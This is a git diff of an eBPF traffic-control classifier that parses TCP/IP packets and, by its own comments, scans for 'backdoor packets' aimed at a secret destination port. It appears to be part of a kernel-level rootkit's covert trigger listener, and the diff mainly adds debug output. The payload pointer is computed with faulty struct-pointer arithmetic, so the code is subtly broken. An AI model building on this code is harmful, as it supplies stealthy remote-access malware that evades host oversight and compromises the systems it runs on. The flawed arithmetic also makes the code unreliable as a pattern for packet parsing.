diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c index 8f3eca9..f2bed12 100644 --- a/src/ebpf/include/bpf/tc.c +++ b/src/ebpf/include/bpf/tc.c @@ -18,51 +18,55 @@ int classifier(struct __sk_buff *skb){ //We are interested on parsing TCP/IP packets so let's assume we have one //Ethernet header - struct ethhdr *eth_hdr = data; - if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){ + struct ethhdr *eth = data; + if ((void *)eth + sizeof(struct ethhdr) > data_end){ bpf_printk("ETH\n"); return TC_ACT_OK; } - if(eth_hdr->h_proto != htons(ETH_P_IP)){ + if(eth->h_proto != htons(ETH_P_IP)){ //Not an IP packet bpf_printk("IP\n"); return TC_ACT_OK; } //IP header - struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr)); - if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){ - bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end); + struct iphdr *ip = (struct iphdr*)(data + sizeof(struct ethhdr)); + if ((void *)ip + sizeof(struct iphdr) > data_end){ + bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip, data, data_end); return TC_ACT_OK; } - if(ip_hdr->protocol != IPPROTO_TCP){ + if(ip->protocol != IPPROTO_TCP){ bpf_printk("TCP\n"); return TC_ACT_OK; } //TCP header - struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); - if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){ + struct tcphdr *tcp = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); + if ((void *)tcp + sizeof(struct tcphdr) > data_end){ bpf_printk("TCP CHECK\n"); return TC_ACT_OK; } //We now proceed to scan for our backdoor packets - __u16 dest_port = ntohs(tcp_hdr->dest); + __u16 dest_port = ntohs(tcp->dest); if(dest_port != SECRET_PACKET_DEST_PORT){ bpf_printk("PORT CHECK\n"); return TC_ACT_OK; } - //Mark skb buffer readable and writable - //bpf_skb_pull_data(skb, 0); + bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end); + bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp); - __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4); - char* payload = (void *)(tcp_hdr + tcp_hdr->doff*4); + //Mark skb buffer readable and writable + + __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4); + bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4); + char* payload = (void *)(tcp + tcp->doff*4); if ((void*)payload + payload_size > data_end){ - bpf_printk("PAYLOAD CHECK\n"); + bpf_printk("PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx\n", payload, payload_size, data_end); return TC_ACT_OK; } + bpf_skb_pull_data(skb, 0); bpf_printk("PAYLOAD size: %u\n", payload_size); diff --git a/src/tc.o b/src/tc.o index 54c02b5..9fb45e2 100644 Binary files a/src/tc.o and b/src/tc.o differ